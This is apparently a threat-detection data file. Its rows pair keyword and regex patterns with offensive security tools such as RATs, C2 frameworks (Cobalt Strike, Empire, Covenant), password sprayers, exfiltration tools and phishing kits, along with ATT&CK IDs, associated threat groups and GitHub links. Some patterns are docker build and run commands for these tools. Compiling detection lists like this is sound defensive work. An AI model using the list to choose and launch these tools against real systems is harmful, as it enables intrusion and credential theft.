"*Do you want to launch the payload from x86 Powershell?*",".{0,1000}Do\syou\swant\sto\slaunch\sthe\spayload\sfrom\sx86\sPowershell\?.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","41296"
"*Do you want to skip test payloads specific for other DBMSes?*",".{0,1000}Do\syou\swant\sto\sskip\stest\spayloads\sspecific\sfor\sother\sDBMSes\?.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","41297"
"*do_attack(*",".{0,1000}do_attack\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","41298"
"*do_bypassuac*",".{0,1000}do_bypassuac.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","41299"
"*do_metasploit(*",".{0,1000}do_metasploit\(.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","41300"
"*do_pyinject*",".{0,1000}do_pyinject.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","41301"
"*do_socksoverrdp(*127.0.0.1*",".{0,1000}do_socksoverrdp\(.{0,1000}127\.0\.0\.1.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","41302"
"*do_socksproxy(* listen_ip = '127.0.0.1'*",".{0,1000}do_socksproxy\(.{0,1000}\slisten_ip\s\=\s\'127\.0\.0\.1\'.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","41303"
"*do_startpscmd(*serverscript.ps1*",".{0,1000}do_startpscmd\(.{0,1000}serverscript\.ps1.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","41304"
"*Do-AltShiftEsc*",".{0,1000}Do\-AltShiftEsc.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-MS16135.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41305"
"*Do-AltShiftTab*",".{0,1000}Do\-AltShiftTab.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-MS16135.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41306"
"*doc/extras/HACKING.*",".{0,1000}doc\/extras\/HACKING\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","41307"
"*docker * covenant*",".{0,1000}docker\s.{0,1000}\scovenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","41308"
"*docker * --name elite *",".{0,1000}docker\s.{0,1000}\s\-\-name\selite\s.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","41309"
"*docker * -t elite *",".{0,1000}docker\s.{0,1000}\s\-t\selite\s.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","41310"
"*docker build . -t spraycharles*",".{0,1000}docker\sbuild\s\.\s\-t\sspraycharles.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","41311"
"*docker build . -t torat*",".{0,1000}docker\sbuild\s\.\s\-t\storat.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","41312"
"*docker build -t credmaster*",".{0,1000}docker\sbuild\s\-t\scredmaster.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","41313"
"*docker build -t hiphp:latest*",".{0,1000}docker\sbuild\s\-t\shiphp\:latest.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","41315"
"*docker build -t legba .*",".{0,1000}docker\sbuild\s\-t\slegba\s\..{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","41316"
"*docker build -t maitm *",".{0,1000}docker\sbuild\s\-t\smaitm\s.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","41317"
"*docker build -t merlin-agent:*-linux*",".{0,1000}docker\sbuild\s\-t\smerlin\-agent\:.{0,1000}\-linux.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#linux","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","41318"
"*docker build -t poshito*",".{0,1000}docker\sbuild\s\-t\sposhito.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","41319"
"*docker build -t rmg .*",".{0,1000}docker\sbuild\s\-t\srmg\s\..{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","41320"
"*docker images | grep cursed*",".{0,1000}docker\simages\s\|\sgrep\scursed.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","N/A","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","41322"
"*docker ps -a | grep cursed*",".{0,1000}docker\sps\s\-a\s\|\sgrep\scursed.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","N/A","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","41323"
"*docker pull egee/sgn*",".{0,1000}docker\spull\segee\/sgn.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","41324"
"*docker rmi evilnginx*",".{0,1000}docker\srmi\sevilnginx.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","41326"
"*docker rmi evilnovnc*",".{0,1000}docker\srmi\sevilnovnc.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","41327"
"*docker run */pacu:latest*",".{0,1000}docker\srun\s.{0,1000}\/pacu\:latest.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","41329"
"*docker run */usr/src/rde1*",".{0,1000}docker\srun\s.{0,1000}\/usr\/src\/rde1.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","41330"
"*docker run */usr/src/rec2*",".{0,1000}docker\srun\s.{0,1000}\/usr\/src\/rec2.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","41331"
"*docker run -it egee/sgn*",".{0,1000}docker\srun\s\-it\segee\/sgn.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","41334"
"*docker run -it -p 1337:1337 -p 5000:5000 *",".{0,1000}docker\srun\s\-it\s\-p\s1337\:1337\s\-p\s5000\:5000\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","41335"
"*docker run -it --rm local/pspy*",".{0,1000}docker\srun\s\-it\s\-\-rm\slocal\/pspy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","41336"
"*docker run -it torat*",".{0,1000}docker\srun\s\-it\storat.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","41337"
"*docker run -itd --name sish*",".{0,1000}docker\srun\s\-itd\s\-\-name\ssish.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","41338"
"*docker run legba*",".{0,1000}docker\srun\slegba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","41339"
"*docker run -p * spring4shell",".{0,1000}docker\srun\s\-p\s.{0,1000}\sspring4shell","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/reznok/Spring4Shell-POC","1","0","N/A","N/A","N/A","4","311","236","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z","41340"
"*docker run --rm -ti maitm -*",".{0,1000}docker\srun\s\-\-rm\s\-ti\smaitm\s\-.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","41341"
"*docker run sitadel*",".{0,1000}docker\srun\ssitadel.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","41342"
"*docker* donut *",".{0,1000}docker.{0,1000}\sdonut\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","41344"
"*docker*/chaos-container:/temp/*",".{0,1000}docker.{0,1000}\/chaos\-container\:\/temp\/.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","41345"
"*docker*/hiphp:latest*",".{0,1000}docker.{0,1000}\/hiphp\:latest.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","41346"
"*docker/gsocket*",".{0,1000}docker\/gsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","41347"
"*docker-compose logs wiresocks*",".{0,1000}docker\-compose\slogs\swiresocks.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","41348"
"*docker-compose up cursedchrome*",".{0,1000}docker\-compose\sup\scursedchrome.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","N/A","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","41349"
"*DockerPwn*",".{0,1000}DockerPwn.{0,1000}","offensive_tool_keyword","DockerPwn","Automation for abusing an exposed Docker TCP Socket. ","T1068 - T1528 - T1550","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/AbsoZed/DockerPwn.py","1","0","N/A","N/A","N/A","3","212","27","2022-12-08T03:17:35Z","2019-11-23T22:32:49Z","41350"
"*DocPlz-main.zip*",".{0,1000}DocPlz\-main\.zip.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","41351"
"*docs.mythic-c2.net*",".{0,1000}docs\.mythic\-c2\.net.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","41352"
